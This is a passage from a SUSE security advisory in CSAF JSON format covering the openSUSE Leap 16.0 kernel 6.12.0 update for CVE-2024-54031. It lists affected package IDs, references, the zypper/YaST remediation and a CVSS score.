"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
